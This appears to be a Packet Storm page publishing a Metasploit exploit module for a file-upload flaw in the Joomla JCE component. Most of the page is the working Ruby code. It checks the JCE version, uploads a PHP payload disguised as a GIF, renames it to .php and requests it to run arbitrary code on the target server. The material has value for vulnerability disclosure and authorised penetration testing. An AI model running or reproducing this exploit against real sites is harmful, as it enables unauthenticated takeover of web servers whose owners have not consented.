exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Component JCE File Upload Remote Code Execution

Joomla Component JCE File Upload Remote Code Execution
Posted Mar 27, 2013
Authored by temp66 | Site metasploit.com

This Metasploit module exploits a vulnerability in the JCE component for Joomla!, which could allow an unauthenticated remote attacker to upload arbitrary files, caused by the fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system. This Metasploit module has been tested successfully on the JCE Editor 1.5.71 and Joomla 1.5.26.

tags | exploit, remote, web, arbitrary, php
SHA-256 | d551a16563e5797049076716bcbb1d33f994204c2b5f2e12601d1eac4daa07b1

Joomla Component JCE File Upload Remote Code Execution

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla Component JCE File Upload Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in the JCE component for Joomla!, which
could allow an unauthenticated remote attacker to upload arbitrary files, caused by the
fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP
request, a remote attacker could exploit this vulnerability to upload a malicious PHP
script, which could allow the attacker to execute arbitrary PHP code on the vulnerable
system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla
1.5.26.
},
'Author' =>
[
'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['BID', '49338'],
['EDB', '17734']
],
'Payload' =>
{
'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
'DisableNops' => true,
'BadChars' => "#",
'Keys' => ['php']
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'Privileged' => false,
'DisclosureDate' => 'Aug 2 2012',
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
], self.class)
end


def get_version
# check imgmanager version
@uri_base = normalize_uri(target_uri.path.to_s, 'index.php')
@vars_get_base = {
'option'=> 'com_jce',
'task' => 'plugin',
'plugin'=> 'imgmanager',
'file' => 'imgmanager'
}
print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
res = send_request_cgi({
'uri' => @uri_base,
'vars_get' => @vars_get_base,
'method' => 'GET',
'version' => '1.1'
})

version = nil
if (res and res.code == 200)
res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
version = $1.nil? ? nil : $1
end

return version
end

def check
version = ( get_version || '').to_s

if (version.match(%r{1\.5\.7\.1[0-4]?}))
return Exploit::CheckCode::Vulnerable
end

return Exploit::CheckCode::Safe
end


def upload_gif
# add GIF header
cmd_php = "GIF89aG\n<?php #{payload.encoded} ?>"

# Generate some random strings
@payload_name = rand_text_alpha_lower(6)
boundary = '-' * 27 + rand_text_numeric(11)

parms = {'method'=> 'form'}
parms.merge!(@vars_get_base)

# POST data
post_data = Rex::MIME::Message.new
post_data.bound = boundary
post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")

data = post_data.to_s

res = send_request_cgi({
'uri' => @uri_base,
'vars_get' => parms,
'method' => 'POST',
'version' => '1.1',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})

if (res and res.code = 200 )
return :access_denied if (res.body =~ /RESTRICTED/i)
print_good("Successfully uploaded #{@payload_name}.gif")
else
print_error("Error uploading #{@payload_name}.gif")
return :abort
end

return :success

end

def renamed?
# Rename the file from .gif to .php

data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"

print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")

res = send_request_cgi(
{
'uri' => @uri_base,
'vars_get' => @vars_get_base,
'method' => 'POST',
'version' => '1.1',
'data' => data,
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8',
'headers' =>
{
'X-Request' => 'JSON'
}
})
if (res and res.code == 200 )
print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
return true
else
print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
return false
end
end

def call_payload
payload = "#{@payload_name}.php"
print_status("Calling payload: #{payload}")
uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'version' => '1.1'
})
end



def exploit

return if not check == Exploit::CheckCode::Vulnerable
if upload_gif == :success
if renamed?
register_files_for_cleanup("#{@payload_name}.php")
call_payload
end
end

end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close